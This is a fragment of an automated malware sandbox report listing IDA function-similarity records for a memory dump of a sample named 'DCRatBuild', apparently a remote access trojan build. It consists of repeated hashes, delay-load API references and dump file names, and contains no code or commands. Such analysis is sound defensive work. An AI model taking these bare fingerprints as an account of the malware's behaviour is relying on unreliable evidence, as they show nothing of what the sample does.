                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ee3f197276be9d231233ee727bebb846e545404c5fec646205f22bf9b28df7a
                                        • Instruction ID: 0fdb901e62f62af4cc388b27f47b71e95f696bb16b7cffbe9e8359f7708d3a60
                                        • Opcode Fuzzy Hash: 9ee3f197276be9d231233ee727bebb846e545404c5fec646205f22bf9b28df7a
                                        • Instruction Fuzzy Hash: 6CB012E536C002BC322C61183D1BD37021CC0C1F10331802FB54AC0042DF4E4C4E9031
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5f4a9479b9120e2fb80256cace945faadb414dc574f1e5fe0aae032e3ef718e7
                                        • Instruction ID: cdd6ea312d0a3dad4b4110bafdcda1df746d4f46a986d311d1cf6364fb22dea3
                                        • Opcode Fuzzy Hash: 5f4a9479b9120e2fb80256cace945faadb414dc574f1e5fe0aae032e3ef718e7
                                        • Instruction Fuzzy Hash: CBB012E536C002FC322C61183C1BD37022CC0C1F10331802FB84AC1042DF4D4C4D9031
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 0f86fad079c69e892c320c038640ab862629b52774f31426b9d909152fe7ae59
                                        • Instruction ID: 12b15f895c9fc63b5e2968f86d677302c95b00ea7b6269ff691d8cb146bd4d2f
                                        • Opcode Fuzzy Hash: 0f86fad079c69e892c320c038640ab862629b52774f31426b9d909152fe7ae59
                                        • Instruction Fuzzy Hash: 20B012E936D001BC322861283C1BE36021CD0C1F10331403FB45BC0442DB4C4C4D9031
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 2b3e946775f88bf363b922cadfeaae2279b0c4b203b14b0308e43fd76fe49017
                                        • Instruction ID: 3140f3c579093417da7353ff7cbfb022999f0d9c18a929b8a9f8feeee284fa6e
                                        • Opcode Fuzzy Hash: 2b3e946775f88bf363b922cadfeaae2279b0c4b203b14b0308e43fd76fe49017
                                        • Instruction Fuzzy Hash: 3EB092E5268106BC222821142C1BC360218C081B10321412AB446D00429B494C8D9031
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: dc96e038468f7d9f1928a297ab4954a2d2388205f129c4e8add29e68ba5dfe48
                                        • Instruction ID: 2b31bf8c3a116c1cd93334bca27d12cec9ddeb82c344ee2b8f0223b15f073459
                                        • Opcode Fuzzy Hash: dc96e038468f7d9f1928a297ab4954a2d2388205f129c4e8add29e68ba5dfe48
                                        • Instruction Fuzzy Hash: 47B012E56AC101FC322C71047C26D36032CC0CAB10330852BB94AE0142F78C5C494031
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 27aad8cc4d2398ed1cb7576dc565fc55c9a7c31ea4742b69bd9a4a2fae71c5eb
                                        • Instruction ID: b9526ab29679c59490a8672d1a72bf61251e0efcbaa0b480972050bd12dcd619
                                        • Opcode Fuzzy Hash: 27aad8cc4d2398ed1cb7576dc565fc55c9a7c31ea4742b69bd9a4a2fae71c5eb
                                        • Instruction Fuzzy Hash: F7B012E56BD201FC362C71047C26D36032CC0C5B10330452BB54AE0152F78C5C494031
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DC36
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5c48f891e92c4d5c3949c93d3fdb4455e1c4decabb7a97bfae7b1d0823f9629c
                                        • Instruction ID: 936b9090e32da802b26353ad8b6ce0fab469e9157e1d46776512a0ca66123d6f
                                        • Opcode Fuzzy Hash: 5c48f891e92c4d5c3949c93d3fdb4455e1c4decabb7a97bfae7b1d0823f9629c
                                        • Instruction Fuzzy Hash: 50B012E56AC205FC322C31007E26C36032CC1C5B10331462BB546F0042B78C5C895031
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d1d3192d5d4ca73a44f1487b54586bfe68f7cee1cc9f8cc924900fc397036104
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: d1d3192d5d4ca73a44f1487b54586bfe68f7cee1cc9f8cc924900fc397036104
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 212b5c796866fa9973eb5beb2941c0ca8ae9417124cc5f2da1d42e03a5d44a48
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 212b5c796866fa9973eb5beb2941c0ca8ae9417124cc5f2da1d42e03a5d44a48
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 6e9b10525886b52b69f00afe37cd1674ac17bd746f8a50acc05b08f69b780e74
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 6e9b10525886b52b69f00afe37cd1674ac17bd746f8a50acc05b08f69b780e74
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 49b6d51cc148312df9bd59acd51d4f95c187459f4f2c739f0bab461a72fa4627
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 49b6d51cc148312df9bd59acd51d4f95c187459f4f2c739f0bab461a72fa4627
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 045135c3046373f0d89dfde3944f1581a97d94885aa7a65ac5df71cfcdf83c26
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 045135c3046373f0d89dfde3944f1581a97d94885aa7a65ac5df71cfcdf83c26
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 8184c6d7bdff944f2a468d296c4301c138fab328e6ac8c1d335c524397cd680e
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 8184c6d7bdff944f2a468d296c4301c138fab328e6ac8c1d335c524397cd680e
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 1380ac914e93e4cc66eae0023261ff0c5ebcbb0e0f2a154315e68c3c5a394a64
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 1380ac914e93e4cc66eae0023261ff0c5ebcbb0e0f2a154315e68c3c5a394a64
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 4e8a140dca09c439819a7647d8f86f007a6478ded2c88fad42936ce6e1888148
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 4e8a140dca09c439819a7647d8f86f007a6478ded2c88fad42936ce6e1888148
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 339873a8aa32d2d91f7355035ef9e24b92bad97c1cf6c3195aeee1b5c1aca6ce
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 339873a8aa32d2d91f7355035ef9e24b92bad97c1cf6c3195aeee1b5c1aca6ce
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9bc6a13d9b95e8832314f179a0c8491d56c043c258a68f501eec43c5e2de2798
                                        • Instruction ID: 315760f5f92eb3e7954dfe2992808b4e3354fa1ea632a926d316600675e4d33c
                                        • Opcode Fuzzy Hash: 9bc6a13d9b95e8832314f179a0c8491d56c043c258a68f501eec43c5e2de2798
                                        • Instruction Fuzzy Hash: 2FA002D566D502BC312861516D56D36021DC4C7B517314559B497D44C197486D495871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
